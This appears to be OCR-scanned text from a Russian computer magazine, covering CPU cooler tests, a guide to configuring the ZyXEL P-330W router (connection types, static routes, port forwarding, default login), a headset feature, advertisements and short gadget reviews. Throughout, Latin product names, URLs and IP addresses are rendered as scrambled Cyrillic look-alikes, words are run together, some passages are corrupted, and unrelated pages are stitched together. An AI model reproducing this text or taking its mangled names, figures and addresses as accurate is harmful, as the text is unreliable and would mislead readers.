Уровень шума, дБ: н/д 

Совместимость: Боскеі 754, 939, 478, 1 _ 6 А 775 

Габариты, мм: 131x108x153 
Материал: медь, алюминий 




Несмотря на то что ребрауТипіц Тоѵѵег 1 20 алюминиевые, он легко обошел 
своих цельно медных конкурентов. Почему? Этому поспособствовало, 
во-первых, хорошо отполированное основание, а во-вторых, 120-милли- 
метровый пропеллер, находящийся внутри и имеющий ктомуже не 7, а 9 
лопастей. В-третьих, габариты девайса несколько больше, а значит, пло- 
щадь рассеиванияувеличена. Ктомуже тут все 6теплотрубок(поЗ сдвух 
сторон, уходящие в ребра). Комплектация тоже вполне ничего. Крепление 
довольно простое: не понадобится даже отвертка, а чтобы не перестарать- 
ся и не сломать плату, оно сделано на пружинках. В комплекте нашлось 
место и регулятору оборотов. А благодаря тому что пропеллер находится 
внутри, достигнута совместимость почти со всеми платами. 




Креплениетребует демонтажа платы, однако является самым надежным 
из-за использования рамки-подложки. Вес кулера почти килограмм 
(около 800 грамм), и при установке в корпус материнская плата может 
деформироваться. 




> Самая эффективная система воздушного 
охлаждения в нашем тесте 



Вывод 

Первое место в этом тесте занимает водянка Рготосіг Сооіесі Зііепсе 
Зтаіі Раскаде. Ее создавали специально для экстремалов, а подой- 
детона всем. Даже в самом «слабом» варианте она демонстрирует 
великолепные результаты. Лучшей покупкой становится воздушный 
кулер Типіц Тоѵѵег 1 20. Несмотря на высокое содержание алюминия в 
конструкции, охлаждающие способности у него отличные, и ему можно 



доверить любой процессор, а потом еще и разогнать его как следует. 
Также отдельно хочется отметить продукты компании 2а1тап. Хоть 
они и не заняли первых мест, к ним все же стоит присмотреться. Их 
привлекательными чертами являются функциональность, просто- 
та, удобство и качество. С ними всегда приятно работать. Ато, что 
2аІтап’ы отстали от остальных, — это ничего, ведь конкуренты у них 
сильнее некуда. ІЗС 
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Учимся настраиват 
интернет-центр 



Выходом в интернет из дома сейчас уже мало кого удивишь. Для владельцев домашних компью- 
теров это стало таким же привычным удобством, как стационарная и сотовая телефонная связь. 
Со временем в семье воз ни кает второй компьютер, потом ноутбук, КПК, ІР-телесион и так далее. 
Очень скоро появляется желание объединить их в едину^р^Геть, как минимум для обмена файла- 
ми, и обычно для решения этой задачи достаточно тожФрести недорогой свитчДон же коммута- 
тор), а для подключения мобильных устройств -^трсгчку доступа ѴѴІ-РІ (беспроводной коммутатор). 
ІЗёпча^щого чаще встает вопрос совместндкц^оступа в интернет на одном аккаунте, предостав- 
лен ном7Тр^^вж4дед^ж^щзш1IДIЫ^ сети от посторонних глаз (в частности, еще и пото- 

му, что не все провайдеры приветствуют множественное подключение). Длястого потребуется 
более сложное решение, традиционно именуемое маршрутизатором, или роутером. 

Класс домашних маршрутизаторов, изначально разработанных для организации доступа в 
интернет по выделенной линии Еі: И е гп еі (А05І_-маршрутизаторы, несмотря на схожесть, рас- 
сматривать сегодня не будем), то есть без помощи промежуточного кабфіьного или х05І_-мо- 
дема, только-только формируется. И не в последнюю очередь имен ноусвязи с потребностями 
и особенностями российского рынка услуг доступа в интернет, потому/как за пределами Рос- 
сии, например в Европе, технология Меіто ЕіЬегпеД или ЕТТН, ЕіЬег/пеІ То ТКё Ноте, почти 
не распространена. Устройства для доступа в интернет по выделенже называют по-разному: 
кто — мультифункциональными роутерами, кто — комбайнами. Нга Западе встречается поня- 
тие «интернет-шлюз», а в наших палестинах продвигается аналогичное ..А «интернет-центр» 
(преимущественно усилиями компании ХуХЕЦ. По сути, все элю одно и то же — в основе лежит 
ЫАТ-маршрути заТор чаще всего с интегрированным коммутатором, файрволом, беспроводной 
точкой доступа; Иногда сюда добавляют функции шлюздДР -телефонии. 

В этой статье мы рассмотрим основные функции и особенности интернет-центра для подклю- 
чения по выделенной линии ЕіЬегпеЦ а также их настройку на примере модели 2уХЕЕ Р-330ѴѴ. 
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Немного теории 

Интер нет- центр обладает двумя типами портов — ѴѴАІЧ и ЬАЫ. ѴѴАІЧ — со- 
кращение от ѴѴісІе Агеа Ыеіѵѵогк — является «выходом» во внешнюю сеть. 
То есть кабель, приходящий от провайдера, нужно подключать именно 
к этому порту. І_АЫ — сокращение от І_осаІАгеа Ыеіѵѵогк, и, как следует, 
сюда подключается внутренняя (домашняя) сеть. 

Первое, что нас должно интересовать в роутере, — будет ли он ра- 
ботать с нашим провайдером. В зависимости от конкретного случая 
провайдер может использовать различные методы для организации 
доступа пользователей в интернет. Иногда все, что требуется задать 
в настройках роутера, — это ІР-адрес, маска сети и шлюз провайде- 
ра. Но возможна и другая, более сложная, ситуация с применением 
протоколов аутентификации РРТР/І_2ТР или РРРоЕ. РРТР весьма 
часто используется в районных или домовых сетях, а также некото- 
рыми крупными провайдерами, например в сети «Корбина Телеком». 

В таком случае потребуется дополнительно ввести логин/пароль 
на аккаунт и адрес ѴРІЧ -сервера авторизации. И вот здесь кроется 
огромная проблема. Какуже говорилось выше, на Западе с прямым 
провайдингом по Еібегпеі никто особо не заморачивается, поэтому в 
завезенных с иностранных рынков устройствах нередко предусмот- 
рены лишь примитивные настройки, в частности принято совмещать 
шлюз с ѴРІЧ -сервером. Так, если у нас адрес шлюза не совпадает с 
адресом ѴРЫ-сервера, а отдельного поля для ввода адреса сервера 
не предусмотрено, то работать ничего не будет. Но даже если таковое 
есть, радоваться пока рано. Некоторые провайдеры располагаютѴРІЧ- 
сервер за шлюзом. Иными словами, не втой же подсети, к которой 
подключены мы, а в другом сегменте. 

Еще одна проблема кроется в функции статической маршрутизации. 

В случае использования вышеупомянутых протоколов авторизации 
для подключения к интернету создается два соединения: первое 
связывает с сетью провайдера, а второе появляется после прохожде- 
ния аутентификации на ѴРЫ-сервере провайдера. Чаще всего роутер 
«забывает» о первом соединении при подключении интернета, и 
мы лишаемся доступа к сети провайдера (где находится множество 
полезных локальных ресурсов). Для решения этой проблемы необ- 
ходимо прописать в настройках маршрутизатора (если вообще это 
предусмотрено производителем) статические маршруты в локальную 
сеть провайдера. Нои тут не все так гладко: далеко не во всех моделях 
домашних роутеров есть возможность указывать, через какой именно 
сетевой интерфейс доступен данный маршрут (как следствие, все па- 
кеты опять-таки шлются через интернет-соединение), а иногда выбор 
интерфейса ограничивается значениями ЕАЫ и ѴѴАІЧ. В последнем слу- 



чае логично, конечно, выбрать ѴѴАІЧ, но на этом сетевом интерфейсе, 
какуже было сказано, два соединения, и как пояснить роутеру, какое 
именно из них следует использовать, большой вопрос. Есть и третья 
значительная проблема — балансировка нагрузки между РРТР-серве- 
рами при помощи 0145. 

Специфика большинства домашних роутеров, даже самых блестящих, в 
том, что, по замыслу производителей, они прежде всего решаютзадачу 
так называемой локальной коннективности, то есть соревнуются в 
надстройках над беспроводными стандартами (МІМО, Зирегб ит.п.), а 
клиентская часть ѴѴАІЧ-интерфейса формируется по остаточному принци- 
пу. Выполнять все названные выше функции способны лишь некоторые 
экземпляры. Многие из них, чтобы научить правильно функционировать 
в наших домовых сетях, приходится перепрошивать, причем прошивки 
это неофициальные (следовательно, влекут потерю гарантии) и зачастую 
неуниверсальные. 

Интернет-центр ХуХЕЬ Р-ЗЗОѴѴ изначально разрабатывался для 
подключения к интернету с учетом специфики оказания услуг рос- 
сийскими провайдерами и домовыми сетями. Реализованная в нем 
фирменная технология Ьі п к Оио развязывает целый клубок проблем: 
позволяет работать в сетях, где используются протоколы авторизации 
РРТР/Е2ТР/РРРоЕ (даже в случае нахождения ѴРІЧ-сервера вне поль- 
зовательского сегмента); поддерживает статическую маршрутизацию 
(роуты могут какзадаваться вручную, так и получаться автоматически 
с ОНСР-сервера); одновременно обеспечивает доступ как в интернет, 
таки к локальным ресурсам провайдера. 

Настройка через ѵѵеЬ-интерфейс 

По умолчанию ХуХЕЬ Р-ЗЗОѴѴ присвоен ІР-адрес 192.1 68.1 .1 и запущен 
ОНСР-сервер, который выдает пользователям ЕАІЧ-сегмента адреса из 
этой подсети (192.168.1.0/24). Соответственно, для настройки посредс- 
твом ѵѵеЬ- интерфейса в адресной строке браузера следует ввести адрес 
Ыір://1 92.1 68. 1 .1/. Логин/пароль по умолчанию — абтіп/1234. Пройдя 
авторизацию, мы попадаем в главное меню настройки. Страница, откры- 
ваемая поумолчанию (Зіаіиз), содержитинформацию об ирбте (времени 
работы с момента последнего перезапуска), версии используемой про- 
шивки, текущих настроек І_АІЧ- и ѴѴАІЧ-портов и состоянии беспроводно- 
го подключения. Первыйже пункт меню 5еШр ѴѴігагсІ позволяетускорить 
процесс настройки, последовательно открывая страницы с наиболее 
важными параметрами. Пройдемся по ним. 

Орегаііоп Мобе. Здесь можно выбрать режим работы устройства. По 
умолчанию 2уХЕЬ Р-ЗЗОѴѴ работает в режиме Оаіеѵѵау (в терминологии 
локализованной документации 2уХЕЬ — интер нет- центр с подклю- 
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чением по выделенной линии ЕіЬегпеі) . В этом случае подключение к 
интернету осуществляется через ѴѴАЫ-порт. Следующий принципиаль- 
ный режим — ѴѴігеІезз ІБР, то есть становится возможным подключить- 
ся к интернету через ѴѴі-Рі (например, через оператора боШеп ѴѴі-Рі). 
Все пять портов коммутатора могутбыть использованы для домашних 
компьютеров и сетевых устройств; держать включенным комп, скажем, 
для работы веб-камеры, при этом уже не требуется. Поскольку устройс- 
тво содержит единственный ѴѴі-Рі приемопередатчик, уже работаю- 
щий в режиме клиента, в этом режиме работы мы лишаемся функции 
локальной беспроводной точки доступа. Третий возможный режим 

— Ассезз Роіпі (беспроводная точка доступа) — позволяет использо- 
вать устройство исключительно в целях организации ѴѴі-Рі сети. Все 
функции маршрутизации в этом случае деактивируются. И, наконец, 
последний режим — ѴѴігеІезз Вгісіде (беспроводной ЕШегпеІ-адаптер) 

— позволяет использовать 2уХЕІ_ Р-ЗЗОѴѴ при объединении проводных 
сетей по ѴѴі-Рі или для беспроводного подключения игровой приставки, 



авторизации: РАР, СНАР, МБСРІАР-ѵІ и М5СНАР-ѵ2. Из дополнитель- 
ных опцией доступно: ответ на эхо-запрос (ріпд) со стороны ѴѴАІЧ-порта 
(по умолчанию роутер отвечает на пинги извне, но в целях безопасности 
можно отключить эту опцию), включение протокола ІЭРпР (Упіѵегзаі 
Ріид апб Ріау) и возможность прохождения дополнительных ѴРІЧ-тун- 
нелей (ІРБес, РРТР/1_2ТРѴРІ\І Разз-ТЬгоидЬ). Последнее будет полезно, 
например, в случае подключения с одного из компьютеров в І_АЫ- 
сегменте 2уХЕІ_ Р-ЗЗОѴѴ к корпоративной сети через интернет. В этом 
случае для сквозного прохождения ѴРЫ-туннеля как раз и потребуется 
функция ѴРЫ Разз-ТЬгоидб. 

Раздел РаззѵѵогсІ позволяет изменить пароль на учетную запись адми- 
нистратора, таким образом снизив вероятность несанкционированного 
доступа к настройкам интер нет- центра. 

ѴѴігеІезз. Довольно большой раздел отведен под настройки беспроводного 
соединения. В подменю Вазіс БеШпдз можно выбрать режим работы ѴѴі-Рі 
модуля (точка доступа или клиент), поддерживаемые стандарты ѴѴі-Рі (ІЕЕЕ 




«ПОЛНОСТЬЮ ЛОКАЛИЗОВАННАЯ ФИРМЕННАЯ УТИЛИТА НА- 
СТРОЙКИ МОДЕМОВ И ИНТЕРНЕТ-ЦЕНТРОВ 2УХЕЬ ТРЕБУЕТ 
ОТ ПОЛЬЗОВАТЕЛЯ МИНИМУМ ВРЕМЕНИ И ЗНАНИЙ, ЧТОБЫ 
ВВЕСТИ УСТРОЙСТВО В РАБОТУ, ОДНАКО МОЖЕТ БЫТЬ ПОЛЕЗ- 
НА НЕ ТОЛЬКО ЧАЙНИКАМ» 



имеющей только порт ЕіНегпеІ: (можно также значительно сэкономить 
при беспроводном подключении сетевого принтера — оригинальные 
ѴѴі-Рі модули стоят дороже универсального Р-ЗЗОѴѴ). В данном случае 
2уХЕІ_ Р-ЗЗОѴѴ также выступает в роли клиента ѴѴі-Рі; все функции мар- 
шрутизации деактивированы. 

І_АЫ. Эта страница содержит настройки подключения локального сегмен- 
та сети (І_АЫ]. РІичем особенным не выделяется; настройки ОРІСР-сервера 
позволяютактивировать/деактивировать оный, задать диапазон выда- 
ваемых клиентам ІР-адресов и статические соответствия МАС-адресов 
ІР-адресам. 

ѴѴАЫ. Этот пункт меню содержит параметры для подключения к ин- 
тернету (используется только в первых двух режимах). Предусмотрено 
пять возможныхтипов подключения: 5{абс ІР, ОНСР Сііепі, а также с 
авторизацией по протоколам РРРоЕ, РРТР и І_2ТР. В первом случае 
настройки (ІР-адрес, маска, основной шлюз и адреса ОЫБ-серверов) 
задаются вручную, во втором — автоматически получаются с ОНСР- 
сервера провайдера. Оба этих варианта пригодны либо в сетях, где 
интернет раздается пользователям через классический ЫАТ (без 
использования ѴРЫ -авторизации), либо для подключения к локальной 
сети без интернета. Режим с авторизацией по протоколу РРРоЕ может 
использоваться совместно с І_АЫ А051_-модемом. В таком случае А05І_- 
модем будет выступать исключительно в качестве А05І_-моста (то есть 
в режиме Ьгісіде), а настройки подключения (обычно это только логин 
и пароль) нужно будет ввести в меню. Настройки ІР в случае исполь- 
зования протоколов РРТР/І_2ТР могут какзадаваться вручную, так и 
получаться с ОНСР-сервера провайдера. В последнем случае будет 
необходимо задать только адрес ѴРЫ-сервера (в виде ІР-адреса или 
ІІРІ_) и логин/пароль на аккаунт. Здесьже исчерпывающий выбортипа 



802.1 1 Ь, ІЕЕЕ 802.1 1 д или смешанный режим), канальную скорость (вплоть 
до 54 Мбит/с), идентификатор сети 55Ю и частотный канал. Подраздел 
АбѵапсесІ Беібпдз служит для выбора: типа авторизации (открытая система, 
предустановленный ключ и автоматический выбор), длины преамбулы (по 
умолчанию используется длинная преамбула; выбор короткой преамбулы 
позволяет несколько повысить производительность беспроводного соеди- 
нения, но делает невозможным использование канальных скоростей 1 и 2 
Мбит/с, так как в этом случае устройства попросту не смогут синхронизи- 
роваться сточкой доступа), режима вещания идентификатора 55Ю и подде- 
ржки протокола ІАРР (Іпіег-Ассезз Роіп* Ргоіосоі). Последний позволяет 
создавать беспроводную роуминговую сеть при использовании нескольких 
точекдоступаА/Ѵі-Рі роутеров с поддержкой соответствующего протокола. 
Собственно настройка шифрования производится в подпункте Бесигііу. 
Доступно: использование шифрования с ѴѴЕР-ключом (64и 1 28 бит), ѴѴРА, 
ѴѴРА2 и смешанный режим (перечислены в порядке возрастания степени 
защищенности). Можно задействовать как предустановленный ключ, так и 
авторизацию с помощью РАОІІІБ-сервера. В случае ѴѴРА можно исполь- 
зоватьключиТКІРили АЕ5. Последний вариантболее предпочтителен с 
точки зрения безопасности, но могут возникнуть проблемы совместимости с | 
у стр ойствами.поддерживающими тол ь ко ста ндарт ІЕЕЕ 802. 1 1 Ь. 

Также повысить безопасность беспроводной сети можно, зайдя в меню 
Тшз1:есІ БШіопз. По сути, это ограничение доступа по МАС-адресам, по 
умолчанию выключенное. В случае его включения подсоединиться по 
ѴѴі-Рі смогуттолькоте адаптеры, чьи МАС-адреса будутуказаны в этом 
списке. Кстати, тут имеется довольно полезный пунктБіІе Бигѵеу, который 
выводитсписокдоступных ѴѴі-Рі сетей, и, если ѴѴі-Рі модуль интернет- 
центра переведен в режим клиента, можно прямо отсюда осуществить 
подключения к найденной ѴѴі-Рі сети. 
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АсІѵапсесІ. Этот довольно объемный раздел меню содержит настройки: 
ограничения доступа, защиты от попыток ЭоЗ-атак из интернета, сервиса 
ОупОЫЗ (позволяющего назначить устройству символьное имя, чтобы 
всегда обращаться кнему независимо отсмен ІР-адреса), выделения в 
локальной сети демилитаризованной зоны ЭМ2, поддержки корректной 
работы в интернете таких приложений, какОиіскТіте, ВайІе.ЫЕТ, ОіаІРасІ 
и других, трансляции портов и статической маршрутизации. Остановимся 
на наиболее важных из них. 

ѴігІиаІЭегѵегз. Этот пункт меню пригодится, если ты вдруг захочешь со- 
здатьу себя на компьютере РТР-сервер, игровой сервер или любой дру- 
гой ресурс, которым бы ты хотел поделиться с друзьями из сети или интер- 
нета. Любой сервер используетопределенный номер порта и протокол, 
по которым он принимает входящие соединения. Например, для РТР это 
ТС Р : 2 1 , для НТТР — ТСР:80, для ОиакеЗ — ТСР:27960, для СоипІегЗігіке 
— ТСР:2701 5. Для того чтобы эти сервисы, поднятые на твоем компьютере, 



соединения и сопутствующих режимов. Следующее меню предлагает 
выбрать один из четырех возможных режимов работы интернет-цен- 
тра, фактически дублируя пункт ѵѵеЬ-интерфейса ОрегаЛоп Мобе, о 
котором мы уже писали выше, и очень помогает неопытным пользо- 
вателям, плохо разбирающимся в специфике сетевой адресации. 

Если выбрать первый режим (интер нет- центр для выделенной линии), 
утилита предложит настроить собственно интернет-соединение и 
беспроводную сеть. Настройка ѴѴі-Рі почти полностью аналогична тому, 
что имеет место в ѵѵеЬ-интерфейсе (с помощью ЫеіРгіепб вдобавок 
реализован алгоритм выбора оптимального радиоканала сучетом 
текущей загруженности эфира), поэтому мы сразу перейдем к пункту 
настройки доступа в интернет. Нам предлагается выбрать из списка 
свое местонахождение, провайдера и тип подключаемой услуги. На 
данный момент утилита содержит настройки для подключения более 
чем кЗО провайдерам по всей России, включая столичного беспровод- 



«ИНТЕРНЕТ-ЦЕНТР 2ѴХЕІ. Р-ЗЗОѴѴ ИЗНАЧАЛЬНО РАЗРА- 
БАТЫВАЛСЯ ДЛЯ ПОДКЛЮЧЕНИЯ К ИНТЕРНЕТУ СУЧЕТОМ 
СПЕЦИФИКИ ОКАЗАНИЯУСЛУГ РОССИЙСКИМИ ПРОВАЙ- 
ДЕРАМИ И ДОМОВЫМИ СЕТЯМИ. РЕАЛИЗОВАННАЯ В НЕМ 
ФИРМЕННАЯ ТЕХНОЛОГИЯ ЬШК 01)0 РАЗВЯЗЫВАЕТ ЦЕ- 
ЛЫЙ КЛУБОК ПРОБЛЕМ» 



были видны пользователям сети, необходимо пробросить соответствую- 
щие порты в настройках интер нет- центра. Итак, нам следуетзадать ІР-ад- 
рес локального компьютера (на котором поднят сервер), используемый 
протокол (чаще всего этоТСР, но бываети ІШР) и номер порта (или диапа- 
зон). В 2уХЕІ_ Р-ЗЗОѴѴуже создано несколько стандартных профилей (для 
РТР, НТТР, Е-Маіі, ОЫЭ иТеІпеі), в которых надо указать только ІР-адрес, 
на который следует перенаправлять соответствующие запросы. 

Зіаііс РоіЛе. Об этой функции мы уже упоминали выше. РІапомним, 
что она позволяет сохранить доступ клокальным ресурсам провай- 
дера при использовании дополнительных протоколов авторизации 
(РРТР/І_2ТР и РРРоЕ). Если провайдер не раздает автоматически эти 
маршруты через ОНСР, то все, что следует сделать, — это последо- 
вательно ввести ІР назначения (это можетбыть и один ІР-адрес, и 
целая сеть), маску и шлюз, через который доступен этот маршрут. 
Дополнительный параметр метрики (Меігіс) в данном случае не так 
важен, так как играет роль в создании приоритета при существова- 
нии двух разных маршрутов до одной и той же сети (или хоста). Всего 
можно задать 1 2 статических маршрутов. Выбора интерфейса, через 
который доступен заданный маршрут, тут нет, однако 2уХЕІ_ Р-ЗЗОѴѴ 
сам его корректно определяет. 

Настройка через №1Ргіепс] 

Полностью локализованная фирменная утилита настройки модемов и 
интернет-центров 2уХЕ1_ требует от пользователя минимум времени и 
знаний, чтобы ввести устройство в работу, однако можетбыть полезна 
не только чайникам. Из главного меню можно перейти к разделу диа- 
гностики устройства, сменить пароль или начать настройку интернет- 



ного провайдера ѲоІбепѴѴіРі. Поэтому велика вероятность того, что, 
выбрав в списке своего провайдера, ты должен будешь ввести только 
свой логин и пароль и фактически настройка интернет-центра на этом 
успешно завершится. ЫеіРгіепсІ обязательно предложит выбрать 
МАС-адрес: заводской интер нет- центра, либо клонированный ствоего 
компьютера (может пригодиться, если провайдер осуществляет при- 
вязку МАС-адресов к портам своего свитча). Если провайдера в списке 
обнаружить не удалось, можно вручную задать параметры подключе- 
ния по аналогии с тем, как мы это делали для ѵѵеЬ-интерфейса, но зато 
с пошаговыми инструкциями на русском языке, контролем состояний и 
подключений, а также с анализом ошибок и инструкциями по их устра- 
нению. По ѵѵеЬ-интерфейсу довольно трудно понять, почему что-то не 
работает: надо читатьзаковыристые логи; а ІЧеіРгіепсІ все проанализи- 
рует и сообщит, где ошибка. 

Выводы 

Как видно, настройка интернет-центра (читай: доступа в интернет 
и домашней сети) не является непосильной задачей. Если ѴѴАЫ- 
интерфейс изначально заточен под российские реалии и есть 
такой софт, как ЫеіРгіепсІ, то не надо шаманить с прошивками и 
статическими маршрутами, чтобы пользоваться интернетом одно- 
временно со всех устройств и при этом иметьдоступ клокальным 
ресурсам провайдера. Ну а техноманьякам остается возмож- 
ность создавать у себя на компьютере общедоступные серверы, 
обеспечивать к ним доступ из интернета с помощью функции ЫАТ 
и конструировать разветвленные сети посредством дополнитель- 
ных режимов, нс 
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ВАСИЛИЙ ЛЕНСКИЙ 

/ ѴАЗІЫѴ.І.ЕЫ@СМАІІ..СОМ / 



5еппНеІ5ег 




РС 166 (15В 

Вот ведь какая штука Порой самые обык- 
новенные вещи, от которых не ждешь ничего 
сверхъестественного, могут доставить массу 
удовольствия и радости. И гарнитура РС 166 
ЦІ 5 В от компании Сеннхайзер Аудио — это как 
раз тот самый случай. Если через час исполь- 
зования обычной гарнитуры голова начинает 
пухнуть, а уши — требовать свободы, то с гар- 
нитурой от Зеппбеівег ты даже не заметишь, 
что на голове что-то есть, настолько хорошо 
продумана их конструкция! Длинный провод 
позволит дотянуться даже до самого дальне- 
го источника звука, причем лишняя его часть 
легко наматывается на удобную катушку и не 
болтается под ногами. 

На пульте, помимо регулятора громкости, есть 
кнопка для быстрого отключения микрофона. 
И вотеще что. Тебе слабо подключить гарнитуру 
к компьютеру, у которого вообще нет звуковой 
карты? Нам нет. Слово 115В в названии модели 
не случайно: в комплекте идет внешняя звуко- 
вая карта ЗеппЬеівег. Достаточно воткнуть ее в 
порт компьютера и после автоматической ус- 
тановки драйверов радоваться качественному 
звучанию. Вот это я понимаю — гаджет! 



С помощью беппНеізег РС 166 (15В 
ты сможешь: 



1. Вдоволь общаться с друзьями из других 
городов и даже стран. Единственное условие 
— утебя и собеседника должен быть установ- 
лен 5куре ( ѵѵѵѵѵѵ.зкуре.сот ) или Оігто [ ѵѵѵѵѵѵ. 
аігторгоіесЕсот ]. Плату за разговор никто не 
возьмет, все бесплатно! А вот для того чтобы 
позвонить на городской или мобильный те- 
лефон, придется заплатить денежку. Но даже 
по нашим российским меркам плата совсем 
небольшая. 



2 . Выиграть 5 ящиков пива, обыграв уверен- 
ного в себе противника по интернету. Воттебе 
важный хинт: даже в тех играх, где общение 
голосом не предусмотрено, вполне реально 
использовать умопомрачительную тулзу 
ТеатВреак [ ѵѵѵѵѵѵ.аоіеатБреак.сот ] и легко 
обсуждать все действия со своей командой 
голосом. 



3. Насладиться по-настоящему качественным 
звучанием любимых музыкальных произведе- 
ний. Выжать максимум из своей звуковой карты 
поможет подключаемый к популярным про- 
игрывателям плагин йЕХ ( ѵѵѵѵѵѵіхБоипсі.сот ). 

С его помощью совершенствуются частотные 
характеристики и устраняется два главных не- 
достатка: срез высоких частот и недостаточное 
разделение стереобазы и ее глубины. 
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Расстояний 
не существует 




Все для видеосвязи и интернет-телефонии 







Веб-камера Стереогарнитура 

А4ТесН РК-7МА А4ТесІі Н5-60 



Клавиатура А4ТесИ КІР(5)-800 
со встроенной трубкой 



Стереогарнитура Веб-камера 
А4ТесМ Н5-7Р А4ТесЬ РК-635М 



\л/\л/\л/.а41есІі.іпТо 



Живите так, как вам нравится! 




Те гг и т 




$200 



Сгеаііѵе 
РІаусІоск 2500 

Забавный аттач для люби- 
мого плеера 



Технические характеристики: 

Мощность динамика, Втна канал: 12 
Мощность сабвуфера, Вт: 24 
Соотношение сигнал/шум, дБ: 80 
Частотный диапазон, Гц: б2~20000 
Количество батарей: 8 
Тип батареи: формате 
Размеры, мм: 170x360x160 
Вес, кг: 2,4 (без батарей) 




1 . В последнее время особой популярностью пользуются довески, которы- 
ми можно расширить возможности портативного проигрывателя. Теперь 
такие есть и для Сгеабѵе 2ЕЫ. 

2. Речь идет о док-станции для вышеупомянутого плеера. С помощью это- 
го оригинального девайса можно не только заряжать плеер, но и «придать 
усиление» ритмам нашего времени. Плеер легко превращается полно- 
ценную аудиосистему формата 2.1 . 

3. Отдельно стоит обратить внимание на пульт дистанционного управле- 
ния. Вместе с док-станцией твой Сгеабѵе 2ЕІЧ не только превратится в до- 
машнюю акустику, но будет управляться миниатюрным пультом ДУ. 

4. Девайс работает от восьми батареекформата С.Теперьты сможешь по- 
радовать своих друзей и близких любимой музыкой. 

5. С помощью специальных портов ты легко выведешь видео и фотогра- 
фии на большой экран своего телевизора — подключение производится 
одним движением. 

6 . В комплекте с устройством поставляется необходимый набор переход- 
ников и кабелей, а также мануал и антенна для уверенного приема 
радиочастот. 

0 

1. Докстанция Сгеабѵе РІаусІоск 2500 поддерживаеттолько плееры серий 
Сгеабѵе2ЕЫ Ѵізіоп:М и Сгеабѵе^ЕЫ V. 



Технические характеристики: 

Форм-фактор вентиляторов, мм: 70 
Скорость, об/мин: 2700~4800 
Шум, дБ: 30,7-45 

Поток воздуха, СЕМ: 36, 5 (максимальный) 
Питание: 4-контактный молекс 

Напряжение/ток, В/А: 12/0,45 

Интерфейсы подключения: РСІ, РСІ-Е, РСІ-Х, А6Р 

Размеры, мм: 207x120x21,5 

Вес, г. 140 




1. Компания ѴІ20 занимается производством моддинговых девайсов и 
периферии для эстетов. В данном случае мы имеем дело с системой до- 
полнительного охлаждения, которая устанавливается в любой свободный 
слот на материнской плате. 

2. В пластиковый каркас вмонтировано 2 небольших вентилятора форм- 
фактора 70 мм. Фактически такой агрегат служит для обдува особо сильно 
греющихся элементов системы, в частности видеокарты. 

3. На торце устройства предусмотрен регулятор оборотов. Пользователь 
может установить скорость вращения на свое усмотрение. Этот регулятор 
выводится вместе с задней панелью на заднюю стенку блока. 

4. Подключается ѴІ20 РгореІІегОиаІРап к стан да ртн о му 4- контактно му мо- 
лексу, не занимая при этом линию. Коннектор изготовлен таким образом, 
что к нему можно подсоединить последовательно еще одно устройство. 

5. Интересно также, что рассматриваемый охладитель оборудован допол- 
нительной диодной подсветкой. Выглядит агрегат весьма эффектно, что 
порадуетлюбителей моддинга. 

0 

1. Любой активный кулер, собранный на основе вентиляторов, создает 
шум — это и понятно. Рассматриваемый гаджет не является исключением. 
Если ты любительтишины.то перед приобретением следует задуматься: 

а оно тебе надо? 

2. Обдув производится потоком под прямым углом, а нагретый воздух мо- 
жет быть выброшен за пределы системы только с помощью корпусного 
вентилятора на задней стенке. Так что для эффективного использования 
системы потребуется еще мощный кулер для сообщения пространства 
внутри корпуса с внешней средой. 
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Геггигм 




МЕХХ МР-8Ю 

Сверхтонкий стильный 
плеер 



Технические характеристики: 

Емкость, Мб: 512/1024/2048 
Дисплей: 1,6" ТРТ 65000 цветов 

Поддерживаемые форматы: МРЕ0 1/2/2, 5/3 І_ауегЗ,ММА, А5Р 
ЕМ-радио: есть 
Габариты, мм: 38x88x7 
Вес, г: 38 




1. Плеер обладает действительно компактными габаритами — он с легко- 
стью поместится даже в маленький кармашек джинсов. 

2 . Кроме того, что девайс воспроизводит музыку, он также способен де- 
монстрировать видео и фото. 

3. Видео формата 5МѴ можно получить перекодированием из МРЕ6, ѴѴМѴ 
или АѴІ.то естьты можешь смотреть даже клипы и фильмы. 

4 . Контрастный дисплей выдает достойную картинку — поддержка 
65000 цветов. 

5 . При желании ты можешь послушать радио. РМ-тюнер хорошо справля- 
ется со своей задачей. 

6 . Есть специальная кнопка для активации записи. Теперь ты точно успе- 
ешь записать любимую песню с радио, даже если она уже началась. 

7 . Интерфейс меню русифицирован, и полная настройка гаджета занимает 
всего несколько минут. 

8 . Расположение кнопоктаково, что плеером легко управлять одной 
рукой. 

Ѳ 

1. Наушники подключаются к разъему тісго-]аск, и если ты захочешь ис- 
пользовать свои обычные наушники, придется возиться с переходниками. 

2 . Экран слишком мал, чтобы с комфортом смотреть видео, так что эту фун- 
кцию стоит рассматривать скорее как фишку. 

3. На лицевой панели легко остаются отпечатки пальцев. 

ІезІ_ІаЬ выражает благодарность за предоставленное на тестирова- 
ние оборудование компании Іпбех (т. (495) 1 65-3227. ѵѵѵѵѵѵ.іпбехсотр.ги ), 
а также российским представительствам компаний Ыехх, ОідаЬуІе и 
Сгеаііѵе. 



» 

СідаЬуіе СА-965Р-ОС)6 

Надежная и многофункциональная плата 
от СідаЬуіе поя процессоры Іпіеі 



Технические характеристики: 

Поддерживаемые процессоры: Іпіеі Соге 2 СІиасІ, ІпІеІСоге2 Рио, Іпіеі 
Репііит О, Іпіеі Репііит ЕЕ, Іпіеі Репііит 4 
Чипсет: Іпіеі Р965 Ехргезз 

Память: поддержка до 8 Гб оперативной памяти формата Р0К2- 
800/667/533 на 4 слотах РІММ 

Слоты расширения: 2хРСІ,2хРСІ Ехргезз Хіб.ЗхРСІ ЕхргезэХі 

Носители: 8 х 5АТА, 1 х РАТА 

Аудио: встроенный кодек Кеаііек 88800 

Поддержка РігеѴѴІге: есть, 2 порта 
Форм-фактор: АТХ, 305x244 мм 




1. На рынке сегодня не так много производителей, которые могут предло- 
жить достойное решение для процессоров Іпіеі. Большинство компаний 
склонно к крайностям. Роль золотой середины может сыграть отличная 
плата бідабуіе 6А-965Р-Э06. 

2 . Эта платформа построена на основе чипсета Іпіеі Р965 Ехргезз и обладает 
всем необходимым для полноценной работы. Например, в комплекте пре- 
дусмотрена панелька с портами е-5АТАдля подключения внешних дисков. 

4 . Одно из больших достоинств платы — охлаждение. Четырехкомпонент- 
ная система с применением тепл овыхтруб охватывает все самые «жар кие» 
элементы системы. 

0 

1. В конструкции предусмотрено только 2 слота РС I , причем один из них 
может быть при крыт охлаждением видеокарты. 

Тестовый стена: 

Процессор: Іпіеі Соге 2 йио Е6700. Память: 2 Гб, СогзаігТѴѴІМ2Х2048- 
